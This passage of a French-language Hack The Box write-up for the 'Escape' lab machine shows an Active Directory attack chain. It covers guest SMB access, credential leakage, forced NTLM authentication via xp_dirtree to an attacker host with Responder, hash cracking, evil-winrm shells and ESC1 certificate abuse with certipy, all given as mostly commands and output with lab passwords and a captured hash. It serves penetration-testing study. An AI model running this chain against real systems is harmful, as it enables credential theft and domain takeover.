class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size max: 48.39 KB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.202.json </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Public&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-11-19 12:50:54&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-11-17 20:47:32&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-11-19 12:51:25&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;48.39 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --get-file <span class="s2">&#34;\\SQL Server Procedures.pdf&#34;</span> <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> --share Public </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Copying <span class="s2">&#34;\SQL Server Procedures.pdf&#34;</span> to <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> File <span class="s2">&#34;\SQL Server Procedures.pdf&#34;</span> was downloaded to <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="credentials-for-mssql">Credentials for MSSQL </h3><p>Le document &ldquo;<strong>SQL Server Procedures.pdf</strong>&rdquo; est une procedure pour se connecter à une instance de <strong>SQL Server</strong>.</p> <p>Ce document fait mention de plusieurs utilisateurs : Ryan, Tom, brandon.brown.<br> On récupère même des credentials pour se connecter au serveur SQL :</p> <ul> <li>PublicUser : <code>GuestUserCantWrite1</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Bonus </span></span><span class="line"><span class="cl">For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with </span></span><span class="line"><span class="cl">user PublicUser and password GuestUserCantWrite1 . </span></span><span class="line"><span class="cl">Refer to the previous guidelines and make sure to switch the <span class="s2">&#34;Windows Authentication&#34;</span> to <span class="s2">&#34;SQL Server Authentication&#34;</span>. </span></span></code></pre></td></tr></table> </div> </div><h3 id="mssql--xp_dirtree-and-responder">MSSQL : xp_dirtree and responder </h3><p>En utilisant <strong>mssqlclient</strong>, on se connecte au sql server avec l&rsquo;utilisateur récupéré.</p> <p>On peut alors effectuer une requête avec la commande <code>xp_dirtree</code> afin d&rsquo;effectuer une fausse requête pour énumerer un share sur notre ordinateur (IP de l&rsquo;attaquant).<br> Dans le même temps on lance un <strong>responder</strong> qui se met en attente. L&rsquo;idée est la commande est executé de manière authentifier avec l&rsquo;utilisateur <strong>sql_svc</strong>, et le responder peut intercepter ses credentials.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mssqlclient.py <span class="s2">&#34;DC&#34;</span>/<span class="s2">&#34;PublicUser&#34;</span>:<span class="s2">&#34;GuestUserCantWrite1&#34;</span>@<span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Encryption required, switching to TLS </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>DATABASE<span class="o">)</span>: Old Value: master, New Value: master </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>LANGUAGE<span class="o">)</span>: Old Value: , New Value: us_english </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>PACKETSIZE<span class="o">)</span>: Old Value: 4096, New Value: <span class="m">16192</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC<span class="se">\S</span>QLMOCK<span class="o">)</span>: Line 1: Changed database context to <span class="s1">&#39;master&#39;</span>. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC<span class="se">\S</span>QLMOCK<span class="o">)</span>: Line 1: Changed language setting to us_english. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ACK: Result: <span class="m">1</span> - Microsoft SQL Server <span class="o">(</span><span class="m">150</span> 7208<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>PublicUser guest@master<span class="o">)</span>&gt; xp_dirtree <span class="se">\\</span>10.10.14.10<span class="se">\f</span>ake<span class="se">\f</span>ile </span></span><span class="line"><span class="cl">subdirectory depth file </span></span><span class="line"><span class="cl">------------ ----- ---- </span></span></code></pre></td></tr></table> </div> </div><p>Ici, on observe la reception du hachage du mot de passe de l&rsquo;utilisateur <code>sql_svc</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ responder -I tun0 -w -F </span></span><span class="line"><span class="cl"> __ </span></span><span class="line"><span class="cl"> .----.-----.-----.-----.-----.-----.--<span class="p">|</span> <span class="p">|</span>.-----.----. </span></span><span class="line"><span class="cl"> <span class="p">|</span> _<span class="p">|</span> -__<span class="p">|</span>__ --<span class="p">|</span> _ <span class="p">|</span> _ <span class="p">|</span> <span class="p">|</span> _ <span class="o">||</span> -__<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span>_____<span class="p">|</span> __<span class="p">|</span>_____<span class="p">|</span>__<span class="p">|</span>__<span class="p">|</span>_____<span class="o">||</span>_____<span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> NBT-NS, LLMNR <span class="p">&amp;</span> MDNS Responder 3.1.5.0 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error starting TCP server on port 53, check permissions or other servers running. </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Client : 10.10.11.202 </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Username : sequel<span class="se">\s</span>ql_svc </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Hash : sql_svc::sequel:1122334455667788:0ED55C287EF37F6AD239ED0D6FE449A0:010100000000000000B9CE454A23DC018C349009419598CF000000000200080044004C005200500001001E00570049004E002D005A004A00320059004300360033004D0035003400480004003400570049004E002D005A004A00320059004300360033004D003500340048002E0044004C00520050002E004C004F00430041004C000300140044004C00520050002E004C004F00430041004C000500140044004C00520050002E004C004F00430041004C000700080000B9CE454A23DC0106000400020000000800300030000000000000000000000000300000051C4546D071DE4532ED8EA78B4BE4B4FB7296E7379A3F3F9319A487E526B2A10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310030000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat--sql_svc-password">Hashcat : sql_svc password </h3><p>On trouve le mot de passe de <strong>sql_svc</strong> à l&rsquo;aide de hashcat et la liste rockyou.txt.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5600</span> ./hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">SQL_SVC::sequel:112233.....0000000:REGGIE1234ronnie </span></span></code></pre></td></tr></table> </div> </div><h3 id="errorlogbak--ryancooper-password">ERRORLOG.BAK : Ryan.Cooper password </h3><p>On peut alors se connecter au compte sql_svc avec evilwinrm et obtenir un powershell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ evil-winrm -u <span class="s1">&#39;sql_svc&#39;</span> -p <span class="s1">&#39;REGGIE1234ronnie&#39;</span> -i <span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On trouve le mot de passe de <strong>Ryan.cooper</strong> dans un fichier de logs de SQL Server : <code>NuclearMosquito3</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 2/7/2023 8:06 AM <span class="m">27608</span> ERRORLOG.BAK </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs&gt; download <span class="s2">&#34;C:/SQLServer/Logs/ERRORLOG.BAK&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remember that in docker environment all <span class="nb">local</span> paths should be at /data and it must be mapped correctly as a volume on docker run <span class="nb">command</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Downloading C:/SQLServer/Logs/ERRORLOG.BAK to ERRORLOG.BAK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat ERRORLOG.BAK <span class="p">|</span> grep -i pass </span></span><span class="line"><span class="cl">2022-11-18 13:43:06.75 spid18s Password policy update was successful. </span></span><span class="line"><span class="cl">2022-11-18 13:43:07.44 Logon Logon failed <span class="k">for</span> user <span class="s1">&#39;sequel.htb\Ryan.Cooper&#39;</span>. Reason: Password did not match that <span class="k">for</span> the login provided. <span class="o">[</span>CLIENT: 127.0.0.1<span class="o">]</span> </span></span><span class="line"><span class="cl">2022-11-18 13:43:07.48 Logon Logon failed <span class="k">for</span> user <span class="s1">&#39;NuclearMosquito3&#39;</span>. Reason: Password did not match that <span class="k">for</span> the login provided. <span class="o">[</span>CLIENT: 127.0.0.1<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -u <span class="s1">&#39;Ryan.Cooper&#39;</span> -p <span class="s1">&#39;NuclearMosquito3&#39;</span> -i <span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\R</span>yan.Cooper<span class="se">\D</span>ocuments&gt; <span class="nb">type</span> <span class="s2">&#34;C:/Users/Ryan.Cooper/Desktop/user.txt&#34;</span> </span></span><span class="line"><span class="cl">d3b6.....cd0e </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation--esc1-template">Privilege Escalation : ESC1 Template </h2><p>When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.</p> <h3 id="enumeration--certipy-find">Enumeration : certipy find </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy find -u <span class="s1">&#39;Ryan.cooper&#39;</span> -p <span class="s1">&#39;NuclearMosquito3&#39;</span> -dc-ip 10.10.11.202 -vulnerable -stdout </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via CSRA </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : sequel-DC-CA </span></span><span class="line"><span class="cl"> DNS Name : dc.sequel.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>sequel-DC-CA, <span class="nv">DC</span><span class="o">=</span>sequel, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101 </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2022-11-18 20:58:46+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2121-11-18 21:08:46+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment : Disabled </span></span><span class="line"><span class="cl"> User Specified SAN : Disabled </span></span><span class="line"><span class="cl"> Request Disposition : Issue </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Enabled </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Owner : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> Access Rights </span></span><span class="line"><span class="cl"> ManageCertificates : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> ManageCa : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Enroll : SEQUEL.HTB<span class="se">\A</span>uthenticated Users </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : UserAuthentication </span></span><span class="line"><span class="cl"> Display Name : UserAuthentication </span></span><span class="line"><span class="cl"> Certificate Authorities : sequel-DC-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : True </span></span><span class="line"><span class="cl"> Certificate Name Flag : EnrolleeSuppliesSubject </span></span><span class="line"><span class="cl"> Enrollment Flag : PublishToDs </span></span><span class="line"><span class="cl"> IncludeSymmetricAlgorithms </span></span><span class="line"><span class="cl"> Private Key Flag : ExportableKey </span></span><span class="line"><span class="cl"> Extended Key Usage : Client Authentication </span></span><span class="line"><span class="cl"> Secure Email </span></span><span class="line"><span class="cl"> Encrypting File System </span></span><span class="line"><span class="cl"> Requires Manager Approval : False </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">0</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">10</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">6</span> weeks </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Enrollment Permissions </span></span><span class="line"><span class="cl"> Enrollment Rights : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Users </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Owner Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Dacl Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Property Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC1 : <span class="s1">&#39;SEQUEL.HTB\\Domain Users&#39;</span> can enroll, enrollee supplies subject and template allows client authentication </span></span></code></pre></td></tr></table> </div> </div><h3 id="requesting-a-malicious-certificate">Requesting a Malicious Certificate </h3><p>On demande un certificat pour Administrator à travers le template vulnérable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy req -username <span class="s2">&#34;Ryan.cooper@sequel.htb&#34;</span> -p <span class="s2">&#34;NuclearMosquito3&#34;</span> -target <span class="s1">&#39;dc.sequel.htb&#39;</span> -ca <span class="s2">&#34;sequel-DC-CA&#34;</span> -template <span class="s2">&#34;UserAuthentication&#34;</span> -upn <span class="s2">&#34;Administrator@sequel.htb&#34;</span> -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;dc.sequel.htb&#39;</span> at <span class="s1">&#39;127.0.0.53&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;SEQUEL.HTB&#39;</span> at <span class="s1">&#39;127.0.0.53&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Generating RSA key </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to connect to endpoint: ncacn_np:10.10.11.202<span class="o">[</span><span class="se">\p</span>ipe<span class="se">\c</span>ert<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connected to endpoint: ncacn_np:10.10.11.202<span class="o">[</span><span class="se">\p</span>ipe<span class="se">\c</span>ert<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">17</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;Administrator@sequel.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate has no object SID </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>### Fixing Kerberos Clock Skew (KRB_AP_ERR_SKEW) L’attaque échoue d’abord à cause d’un décalage horaire (KRB_AP_ERR_SKEW).<br> En ajustant l’heure avec faketime et l’heure réelle du DC, le problème est corrigé.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ date </span></span><span class="line"><span class="cl">Fri Sep <span class="m">12</span> 12:03:10 AM CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ntpdate -q 10.10.11.202 </span></span><span class="line"><span class="cl">2025-09-12 08:20:53.85924 <span class="o">(</span>+0200<span class="o">)</span> +28800.935013 +/- 0.010303 10.10.11.202 s1 no-leap </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ certipy auth -pfx administrator.pfx </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@sequel.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Got error <span class="k">while</span> trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW<span class="o">(</span>Clock skew too great<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ faketime <span class="s2">&#34;</span><span class="k">$(</span>date +<span class="s1">&#39;%Y-%m-%d&#39;</span><span class="k">)</span><span class="s2"> </span><span 